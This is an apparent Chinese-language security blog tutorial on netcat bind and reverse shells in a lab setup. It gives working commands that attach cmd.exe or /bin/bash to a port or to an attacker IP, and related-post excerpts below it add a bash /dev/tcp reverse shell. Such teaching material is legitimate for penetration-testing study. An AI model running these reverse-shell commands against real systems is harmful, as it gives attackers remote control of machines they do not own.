反弹shell的方式——之NC反弹shell

原创 已于 2024-07-24 21:26:14 修改 · 971 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2024-07-24 21:24:56 首次发布

反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell

常见的反弹shell方式:

  1. bash反弹shell

  2. NC反弹shell

  3. python反弹shell

  4. ....

NC反弹shell

Netcat简称NC是一个简单可靠的网络工具,被誉为网络界的瑞士军刀。通过NC可以进行端口扫描,反弹shell,

端口监听和文件传输等操作,常用参数如下:

NC反弹shell-正向反弹D

实验拓扑如下图:

攻击机可以和靶机相互访问,这个时候可以使用正向shell

1.在靶机上运行:

nc -lvvp 1111 -e C://Windows\System32\cmd.exe

2.在攻击机上运行:

nc 172.25.254.156 1111

正向shell:攻击者连接到目标系统的监听端口。

NC反弹shell-反向反弹

实验拓扑如下图:

攻击机不可以直接访问靶机,但是靶机可以访问攻击者机器,这个时候可以使用反向shell

1.在攻击机上运行:

nc -lvvp 1111

2.在靶机上运行:

nc -e  C://Windows\System32\cmd.exe 10.100.24.5 1111

反向shell:目标系统连接到攻击者的监听端口。

NC反弹Shell
qq_23066945的博客
11-23 767
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
常见工具 nc Wireshark反弹shell
代码审计
04-20 1577
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
NC反弹shell
Palpitate_LL的博客
09-13 1227
c 指定连接后要执行的shell命令-e 指定连接后要执行的文件名-l 监听模式-p 设置本地使用的通信端口-u 使用UDP传输协议,默认是TCP-v 显示命令执行过程,使用-vv显示更详细信息。
渗透测试常用反弹shell方法(如何渗透测试反弹shell)—Windows篇渗透测试!
最新发布
qq_41314882的博客
10-20 1083
反弹Shell是一种让攻击者远程控制目标主机的技术,分为正向反弹(控制端连接目标)和反向反弹(目标主动连接控制端)。常用工具有NetCat(NC)、mshta.exe和rundll32.exe。NC反弹需要上传工具到目标主机,通过监听端口实现控制。mshta.exe利用HTA文件执行恶意脚本,可通过Metasploit或Cobalt Strike生成木马文件。rundll32.exe则通过调用DLL文件实现攻击,需配合Metasploit模块使用。反向反弹能绕过防火墙限制,是更常用的方法。这些技术可帮助渗透
nc--反弹shell
wzhua的博客
08-04 3388
nc--反弹shell,小实验
利用NC反弹shell
Chales123的博客
01-17 647
正常情况下shell只能由主机的用户使用,但是反弹shell的目的则是将自己的shell反弹给别的主机,让别的主机可以通过shell来控制自己。举例:假设我们攻击了一台主机,打开了该主机的一个端口,攻击者在自己的主机上去连接目标机器(目标ip:目标机器端口),这是比较常规的方式,叫做正向连接。4.对于病毒、木马,受害者什么时候能中招、对方的网络环境是什么样的、什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是最好的办法。2.目标主机的ip是动态改变的,不能持续控制。
nc的使用+反弹shell
2301_80366980的博客
02-18 1842
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
内网渗透之——内网转发(反弹shell、端口、代理)
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 6111
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
内网转发——反弹shell
cxrpty的博客
03-16 1206
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务...
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 2594
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
Windows/Linux 下nc 反弹shell
热门推荐
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
[保姆级教程]-通过NC反弹shell实战
qq_43681532的博客
02-19 528
环境工具步骤。
nc反弹shell的使用
qq_42307546的博客
03-29 2192
交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是shell与用户进行交互,用户输入退出命令才会终止 例如 cmd终端 msf反弹 非交互shell也可以运行在另一种模式,非交互模式,这种模式是直接读取存放在文件中的命令并且运行,当他读取到文件末尾就会终止 例如:webshell,这种执行完命令之后就会终止掉了 使用反弹shell可以让目标服务器主动连接攻击者,绕过防火墙的拦截,因为防火墙只会拦截外部访问内部的流量并不会主动拦截内部发出的流量 利用nc反弹shell
NC反弹shell的几种方法
qq_59350385的博客
05-12 1万+
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
蚁剑中使用nc反弹shell权限
02-19
为了实现通过蚁剑利用 `nc` 进行反弹Shell的操作,需要确保攻击机已经安装并配置好了NetCat (nc),并且能够正常运行。同时,在目标主机上也需要具备执行命令的能力。 #### 创建监听端口 在攻击者的机器上启动一个...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值